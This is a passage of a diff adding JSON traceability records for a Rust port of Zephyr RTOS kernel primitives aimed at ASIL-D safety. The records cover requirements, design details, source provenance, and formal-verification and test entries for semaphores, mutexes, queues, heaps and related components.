definition of a counting semaphore / reentrant mutex. This makes them robust against C bugs.\n",
+      "id": "FIND-002",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "informs"
+        },
+        {
+          "target": "REQ-TRACTOR-003",
+          "type": "generates"
+        }
+      ],
+      "status": "active",
+      "tags": [
+        "research",
+        "c-code-quality",
+        "verification-gap",
+        "safety"
+      ],
+      "title": "Zephyr C kernel code is not formally verified",
+      "type": "finding"
+    },
+    {
+      "description": "The system shall implement dynamic thread creation with stack pool management for runtime thread provisioning.\n",
+      "id": "ZEP-SYRS-DY",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "dynamic"
+      ],
+      "title": "Zephyr: Dynamic Thread Creation",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "On successful put, the tail index advances by one with wrap-around at capacity.\n",
+      "id": "SWREQ-RB-RB03",
+      "links": [
+        {
+          "target": "SYSREQ-RB-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "ring-buf",
+        "put",
+        "asil-d"
+      ],
+      "title": "RB3: put advances tail = (tail + 1) % capacity",
+      "type": "sw-req"
+    },
+    {
+      "description": "Bitwise AND the complement of the clear mask into the current value.\n",
+      "id": "SWDD-EV-CLEAR",
+      "links": [
+        {
+          "target": "SWARCH-EV-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-EV-EV03",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-EV-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "event",
+        "clear"
+      ],
+      "title": "Event::clear — z_impl_k_event_clear port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Hardware-accurate Renode emulation target for Cortex-M33 (ARMv8-M Mainline with TrustZone) validation.  The nucleo_l552ze_q board with the Renode nucleo_l552ze_q_ns platform runs Gale semaphore tests under Renode 1.16.0.  Confirms Gale functions on ARMv8-M which introduces security extension changes to the exception model. Chosen because Renode 1.16.0 ships a dedicated test platform (tests/platforms/nucleo_l552ze_q/nucleo_l552ze_q_ns.repl) with complete STM32L552 peripheral support including LPUART1.\n",
+      "id": "SWARCH-TGT-003",
+      "links": [
+        {
+          "target": "SWREQ-SEM-P01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-KILN-003",
+          "type": "enables"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "test-target",
+        "renode",
+        "cortex-m33",
+        "stm32l552"
+      ],
+      "title": "Renode emulation target — STM32L552 Nucleo (Cortex-M33)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "Differential tests in tests/differential_spec.rs that verify Gale's ASIL-D properties against independent POSIX/FreeRTOS reference models. Covers semaphore (invariant, give, reset, random ops), mutex (owner correspondence, reentrant lock/unlock), msgq (conservation), and stack (bounds, random ops). Validates that specifications are mathematically sound, not just Zephyr-specific.\n",
+      "id": "FV-TRACTOR-DIFF",
+      "links": [
+        {
+          "target": "REQ-TRACTOR-003",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "differential",
+        "tractor",
+        "specification",
+        "swe-6"
+      ],
+      "title": "Differential specification testing (POSIX/FreeRTOS reference models)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Only defined flag bits (RUNNING, CANCELING, QUEUED, FLUSHING) may be set. The invariant ensures no undefined bits are used.\n",
+      "id": "SWREQ-WK-WK06",
+      "links": [
+        {
+          "target": "SYSREQ-WK-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "work",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "WK6: state flags are mutually consistent",
+      "type": "sw-req"
+    },
+    {
+      "description": "Zephyr's FIFO message queue with fixed-size messages.  Contains k_msgq_init, put/get/peek/purge operations with ring buffer index management.  The Gale port models ring buffer index arithmetic only — actual data copy stays in C.\n",
+      "id": "PROV-MQ-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "msgq",
+        "kernel"
+      ],
+      "title": "Zephyr kernel/msg_q.c — message queue implementation",
+      "type": "source-provenance"
+    },
+    {
+      "description": "Unit tests in src/mempool.rs covering init (valid/zero), alloc (available/full), free (allocated/empty), alloc_many, free_many, total_size (overflow detection), is_full, is_empty, and allocated/free/capacity/block_size queries.\n",
+      "id": "UV-MP-001",
+      "links": [
+        {
+          "target": "SWDD-MP-ALLOC",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "MemPool unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Zephyr driver model integration tests executed on qemu_cortex_m3. Validates that Gale kernel primitives operate correctly within the Zephyr driver subsystem, including init order, interrupt context, and synchronization with device drivers. Test suite: zephyr/tests/drivers/build_all.\n",
+      "id": "SV-DI-001",
+      "links": [
+        {
+          "target": "SYSREQ-DI-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "Driver Integration Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "A memory domain partition manager that matches Zephyr's k_mem_domain API semantics: initialization, add_partition, remove_partition. Must maintain partition non-overlap invariant, address arithmetic safety, and bounded partition count.\n",
+      "id": "SYSREQ-MD-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mem-domain",
+        "kernel"
+      ],
+      "title": "Memory domain partition management with non-overlap invariant",
+      "type": "system-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide a mechanism for threads to check the current count of a semaphore without acquiring it.\n",
+      "id": "ZEP-SRS-5-15",
+      "links": [
+        {
+          "target": "ZEP-SYRS-14",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "semaphore"
+      ],
+      "title": "Zephyr: Checking semaphore count",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Full Zephyr kernel heap test suite executed on qemu_cortex_m3 with CONFIG_GALE_KERNEL_KHEAP=y. Tests exercise k_heap_alloc, k_heap_aligned_alloc, and k_heap_free through the Gale FFI/C shim layer. Test suite: zephyr/tests/kernel/mem_heap.\n",
+      "id": "SV-KH-001",
+      "links": [
+        {
+          "target": "SYSREQ-KH-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "KHeap Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "Aligned allocation accepts only power-of-2 alignment values and computes correct padding without overflow.\n",
+      "id": "SWREQ-HP-HP06",
+      "links": [
+        {
+          "target": "SYSREQ-HP-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "heap",
+        "alignment",
+        "asil-d"
+      ],
+      "title": "HP6: aligned allocation respects alignment constraints",
+      "type": "sw-req"
+    },
+    {
+      "description": "A fault register decode model for ARM Cortex-M CFSR/HFSR/MMFAR/BFAR registers. Must exhaustively classify all fault categories and validate fault address register validity bits.\n",
+      "id": "SYSREQ-FD-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "fault-decode",
+        "arch",
+        "arm"
+      ],
+      "title": "ARM Cortex-M fault register decode model",
+      "type": "system-req"
+    },
+    {
+      "description": "The system shall implement a reentrant mutex synchronization primitive with ownership tracking and priority inheritance for coordinating exclusive access to shared resources among multiple threads.\n",
+      "id": "ZEP-SYRS-MUT",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "mutex"
+      ],
+      "title": "Zephyr: Reentrant Mutex",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Integration tests in tests/fifo_integration.rs exercising the full FIFO API surface across module boundaries. Tests init, put/get sequences, empty-get error path, roundtrip, interleaved operations, and stress cycles.\n",
+      "id": "IV-FI-001",
+      "links": [
+        {
+          "target": "SWARCH-FI-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "FIFO integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "The primary C implementation of Zephyr's mailbox.  Contains k_mbox_init, k_mbox_put, k_mbox_async_put, k_mbox_get, k_mbox_data_get, plus internal mbox_message_match, mbox_message_dispose, and mbox_message_put helpers. The Gale port models message validation, match checking, and data exchange size calculation only — actual thread blocking and data copy stays in C.\n",
+      "id": "PROV-MB-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "mbox",
+        "kernel"
+      ],
+      "title": "Zephyr kernel/mailbox.c — mailbox implementation",
+      "type": "source-provenance"
+    },
+    {
+      "description": "Verus specifications in src/queue.rs with requires/ensures clauses that formally verify queue properties (QU01-QU06) via SMT solving. Proves append/prepend/get ordering, count tracking, and invariant preservation. Executed via: bazel test //:verus_test\n",
+      "id": "FV-QU-001",
+      "links": [
+        {
+          "target": "SWREQ-QU-QU01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-QU-QU02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-QU-QU03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-QU-QU04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-QU-QU05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-QU-QU06",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "Queue Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Verus specifications in src/smp_state.rs with requires/ensures clauses that formally verify SMP state properties (SM1-SM4) via SMT solving. Proves start/stop CPU correctness, global lock safety, and active CPU tracking invariants. Executed via: bazel test //:verus_test\n",
+      "id": "FV-SM-001",
+      "links": [
+        {
+          "target": "SWREQ-SM-SM01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SM-SM02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SM-SM03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SM-SM04",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "SmpState Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Unpend threads from wait queue. If wake_all: unpend all, else unpend at most one. Return woken count.\n",
+      "id": "SWDD-FX-WAKE",
+      "links": [
+        {
+          "target": "SWARCH-FX-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-FX-FX03",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-FX-FX04",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-FX-FX05",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-FX-FX06",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-FX-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "futex",
+        "wake"
+      ],
+      "title": "Futex::wake — z_impl_k_futex_wake port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "When CAS fails (current != expected), the stored value is not modified.\n",
+      "id": "SWREQ-AT-AT04",
+      "links": [
+        {
+          "target": "SYSREQ-AT-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "atomic",
+        "cas",
+        "asil-d"
+      ],
+      "title": "AT4: cas failure leaves value unchanged",
+      "type": "sw-req"
+    },
+    {
+      "description": "Integration tests in tests/timeout_integration.rs exercising the full timeout API surface across module boundaries. Tests add/abort sequences, remaining/expires queries, announce with multiple expirations, ordering preservation, and tick arithmetic edge cases.\n",
+      "id": "IV-TO-001",
+      "links": [
+        {
+          "target": "SWARCH-TO-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "Timeout integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "If any fault status bits are set in CFSR or HFSR, the classify() function returns a non-None fault category. The MMFSR/BFSR/UFSR masks partition all 32 bits of CFSR.\n",
+      "id": "SWREQ-FD-FH01",
+      "links": [
+        {
+          "target": "SYSREQ-FD-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "fault-decode",
+        "exhaustive",
+        "asil-d"
+      ],
+      "title": "FH1: CFSR decode is exhaustive (all bit combinations mapped)",
+      "type": "sw-req"
+    },
+    {
+      "description": "Integration tests in tests/thread_lifecycle_integration.rs exercising the full thread lifecycle API surface across module boundaries. Tests create/setup sequences, priority queries, preemptibility classification, abort cleanup with deferred release, and lifecycle state machine transitions.\n",
+      "id": "IV-TL-001",
+      "links": [
+        {
+          "target": "SWARCH-TL-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "Thread lifecycle integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "Removing a thread from the run queue makes it ineligible for selection by next_up. Maps to sched.c:88-95.\n",
+      "id": "SWREQ-SC-SC02",
+      "links": [
+        {
+          "target": "SYSREQ-SC-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sched",
+        "runq",
+        "asil-d"
+      ],
+      "title": "SC2: runq_remove removes thread from run queue",
+      "type": "sw-req"
+    },
+    {
+      "description": "When a poll event is initialized, its state is set to K_POLL_STATE_NOT_READY and its type is recorded. Maps to poll.c:43-62.\n",
+      "id": "SWREQ-PL-PL01",
+      "links": [
+        {
+          "target": "SYSREQ-PL-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-PL-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "poll",
+        "init",
+        "asil-d"
+      ],
+      "title": "PL1: event_init sets state to NOT_READY",
+      "type": "sw-req"
+    },
+    {
+      "description": "Unit tests in plain/src/condvar.rs covering init, signal (empty/with-waiters), broadcast (empty/with-waiters), wait_blocking, priority ordering, signal-broadcast equivalence, and reuse after broadcast.\n",
+      "id": "UV-CV-001",
+      "links": [
+        {
+          "target": "SWDD-CV-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-CV-SIGNAL",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-CV-BROADCAST",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-CV-WAIT",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "CondVar unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Unit tests in src/dynamic.rs covering init (valid/zero), alloc (available/full), free (allocated/empty), can_serve, active/available queries, is_full, and is_empty.\n",
+      "id": "UV-DY-001",
+      "links": [
+        {
+          "target": "SWDD-DY-ALLOC",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "Dynamic unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Unit tests in plain/src/stack.rs covering init validation, push/pop operations, full/empty boundary conditions, push-pop roundtrip, fill-drain cycles, conservation invariant, and capacity-one edge case.\n",
+      "id": "UV-SK-001",
+      "links": [
+        {
+          "target": "SWDD-SK-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-SK-PUSH",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-SK-POP",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "Stack unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "The readiness check returns true only when the underlying kernel object's state satisfies the poll event's type condition. Maps to poll.c:63-105.\n",
+      "id": "SWREQ-PL-PL02",
+      "links": [
+        {
+          "target": "SYSREQ-PL-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-PL-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "poll",
+        "check",
+        "asil-d"
+      ],
+      "title": "PL2: is_condition_met returns true only when event state matches",
+      "type": "sw-req"
+    },
+    {
+      "description": "Wake all waiting threads with -EAGAIN, set count to 0. Returns number of threads woken. C source: kernel/sem.c lines 166-192.\n",
+      "id": "SWDD-SEM-RESET",
+      "links": [
+        {
+          "target": "SWARCH-SEM-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-SEM-P08",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-SEM-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sem",
+        "reset"
+      ],
+      "title": "Semaphore::reset — z_impl_k_sem_reset port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Kani bounded model checking harnesses in tests/kani_harnesses.rs. Exhaustive exploration of stack init validation, push/pop invariant preservation, conservation, push-pop roundtrip, and fill-drain roundtrip within bounded state space.\n",
+      "id": "UV-SK-003",
+      "links": [
+        {
+          "target": "SWDD-SK-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-SK-PUSH",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-SK-POP",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "kani",
+        "model-checking",
+        "swe-4"
+      ],
+      "title": "Stack Kani bounded model checking",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all atomic code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-AT-003",
+      "links": [
+        {
+          "target": "SWREQ-AT-AT01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "Atomic Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "If active < max_threads: active++, OK. If full: ENOMEM. C source: kernel/dynamic.c lines 34-57.\n",
+      "id": "SWDD-DY-ALLOC",
+      "links": [
+        {
+          "target": "SWARCH-DY-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-DY-DY02",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-DY-DY03",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-DY-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "dynamic",
+        "alloc"
+      ],
+      "title": "DynamicPool::alloc — z_thread_stack_alloc_pool port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "If count > 0: count -= 1, return OK. Else: return -EBUSY. C source: kernel/sem.c lines 132-154 (non-blocking path).\n",
+      "id": "SWDD-SEM-TRY-TAKE",
+      "links": [
+        {
+          "target": "SWARCH-SEM-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-SEM-P05",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SEM-P06",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-SEM-P09",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-SEM-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sem",
+        "take"
+      ],
+      "title": "Semaphore::try_take — z_impl_k_sem_take (K_NO_WAIT) port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all dynamic code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-DY-003",
+      "links": [
+        {
+          "target": "SWREQ-DY-DY01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "Dynamic Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Full Zephyr kernel scheduler test suite executed on qemu_cortex_m3 with CONFIG_GALE_KERNEL_SCHED=y. Tests exercise priority-based scheduling, preemption, cooperative threads, and round-robin through the Gale FFI/C shim layer. Test suites: zephyr/tests/kernel/sched (preempt, cooperative, priority).\n",
+      "id": "SV-SC-001",
+      "links": [
+        {
+          "target": "SYSREQ-SC-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "Scheduler Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "The system shall implement a LIFO synchronization primitive for last-in first-out data exchange between threads.\n",
+      "id": "ZEP-SYRS-LI",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "lifo"
+      ],
+      "title": "Zephyr: LIFO",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "test_and_set returns the previous value and unconditionally stores 1.\n",
+      "id": "SWREQ-AT-AT05",
+      "links": [
+        {
+          "target": "SYSREQ-AT-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "atomic",
+        "test-and-set",
+        "asil-d"
+      ],
+      "title": "AT5: test_and_set returns old value, sets to 1",
+      "type": "sw-req"
+    },
+    {
+      "description": "Unit tests in plain/src/thread_lifecycle.rs covering create initialization, setup field configuration, priority_get correctness, is_preempt classification, abort cleanup resource release, and lifecycle state transitions.\n",
+      "id": "UV-TL-001",
+      "links": [
+        {
+          "target": "SWDD-TL-CREATE",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-TL-SETUP",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-TL-PRIORITY",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-TL-ABORT",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "Thread lifecycle unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "When a timeout is added, its expiry tick is set to curr_tick + ticks. The timeout is inserted into the sorted list maintaining ascending order. Maps to timeout.c:88-145.\n",
+      "id": "SWREQ-TO-TO01",
+      "links": [
+        {
+          "target": "SYSREQ-TO-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-TO-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timeout",
+        "add",
+        "asil-d"
+      ],
+      "title": "TO1: add_timeout inserts with correct expiry tick",
+      "type": "sw-req"
+    },
+    {
+      "description": "When stacks are allocated, free decrements the active count. Empty pool rejects free.\n",
+      "id": "SWREQ-DY-DY04",
+      "links": [
+        {
+          "target": "SYSREQ-DY-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-DY-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "dynamic",
+        "free",
+        "asil-d"
+      ],
+      "title": "DY4: free when active > 0 decrements by 1, no underflow",
+      "type": "sw-req"
+    },
+    {
+      "description": "The ring buffer maintains the consistency invariant: write_idx == (read_idx + used_msgs) % max_msgs. This is verified across all operations. Maps to msg_q.c:43-470.\n",
+      "id": "SWREQ-MQ-MQ13",
+      "links": [
+        {
+          "target": "SYSREQ-MQ-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "msgq",
+        "invariant",
+        "ring-buffer",
+        "asil-d"
+      ],
+      "title": "MQ13: ring buffer consistency (write_idx tracks read_idx + used_msgs)",
+      "type": "sw-req"
+    },
+    {
+      "description": "Clear all flags (flags = 0), marking the pipe as closed.\n",
+      "id": "SWDD-PP-CLOSE",
+      "links": [
+        {
+          "target": "SWARCH-PP-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-PP-PP08",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-PP-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "pipe",
+        "close"
+      ],
+      "title": "Pipe::close — z_impl_k_pipe_close port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Dequeue an item from the head. If count > 0: decrement count, return OK. Otherwise return ENOENT.\n",
+      "id": "SWDD-QU-GET",
+      "links": [
+        {
+          "target": "SWARCH-QU-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-QU-QU04",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-QU-QU05",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-QU-QU06",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-QU-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "queue",
+        "get"
+      ],
+      "title": "Queue::get — z_impl_k_queue_get port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "k_heap_aligned_alloc requires align to be a power of two (or zero), then delegates to the blocking alloc helper with the specified alignment. Maps to kheap.c:131-155.\n",
+      "id": "SWREQ-KH-KH03",
+      "links": [
+        {
+          "target": "SYSREQ-KH-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-KH-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "kheap",
+        "aligned",
+        "asil-d"
+      ],
+      "title": "KH3: aligned_alloc enforces power-of-two alignment",
+      "type": "sw-req"
+    },
+    {
+      "description": "cargo clippy --all-targets -- -D warnings with ASIL-D lint profile: deny arithmetic_side_effects, unwrap_used, expect_used, panic, indexing_slicing, cast_possible_truncation, cast_possible_wrap, cast_sign_loss, wildcard_enum_match_arm, mem_forget. Configured in Cargo.toml [lints.clippy].\n",
+      "id": "FV-SEM-003",
+      "links": [
+        {
+          "target": "SWREQ-SEM-P09",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SEM-P01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "The broadcast woken count cannot overflow because it is bounded by MAX_WAITERS (64), which fits in u32.\n",
+      "id": "SWREQ-CV-C08",
+      "links": [
+        {
+          "target": "SYSREQ-CV-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "condvar",
+        "safety",
+        "overflow",
+        "asil-d"
+      ],
+      "title": "C8: no arithmetic overflow in broadcast woken count",
+      "type": "sw-req"
+    },
+    {
+      "description": "The transmit message target thread must be either a valid thread identifier or K_ANY (wildcard). Invalid targets are rejected.\n",
+      "id": "SWREQ-MB-MB01",
+      "links": [
+        {
+          "target": "SYSREQ-MB-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-MB-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mbox",
+        "validation",
+        "asil-d"
+      ],
+      "title": "MB1: tx_target_thread valid or K_ANY",
+      "type": "sw-req"
+    },
+    {
+      "description": "Verus specifications in src/thread_lifecycle.rs with requires/ensures clauses that formally verify thread lifecycle properties (TH01-TH06) via SMT solving. Proves create initialization, setup configuration, priority correctness, abort cleanup, and lifecycle state transitions. Executed via: bazel test //:verus_test\n",
+      "id": "FV-TL-001",
+      "links": [
+        {
+          "target": "SWREQ-TL-TH01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-TL-TH02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-TL-TH03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-TL-TH04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-TL-TH05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-TL-TH06",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "Thread lifecycle Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "The primary C implementation of Zephyr's device initialization. Contains do_device_init, z_impl_device_init, z_impl_device_is_ready. The init level ordering is from kernel/init.c z_sys_init_run_level. The Gale port models init level ordering and dependency checking only.\n",
+      "id": "PROV-DI-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "device-init",
+        "kernel"
+      ],
+      "title": "Zephyr kernel/device.c — device initialization ordering",
+      "type": "source-provenance"
+    },
+    {
+      "description": "Provide a formally verified persistent key-value storage subsystem for ASIL-D automotive ECU applications.  The subsystem stores configuration, calibration, and safety-critical state in NOR flash with formal proofs of data integrity and crash consistency. Replaces Zephyr's ZMS (Zephyr Memory Storage) module with verified Rust while preserving identical API semantics.\n",
+      "id": "STKH-ZMS-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "safety",
+        "asil-d",
+        "storage",
+        "zms"
+      ],
+      "title": "Persistent key-value storage for ASIL-D automotive applications",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "When try_lock is called on an unlocked mutex, the caller becomes the owner and lock_count is set to 1. Maps to z_impl_k_mutex_lock lines 121-131 in kernel/mutex.c.\n",
+      "id": "SWREQ-MUT-M03",
+      "links": [
+        {
+          "target": "SYSREQ-MUT-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-MUT-3",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mutex",
+        "lock",
+        "asil-d"
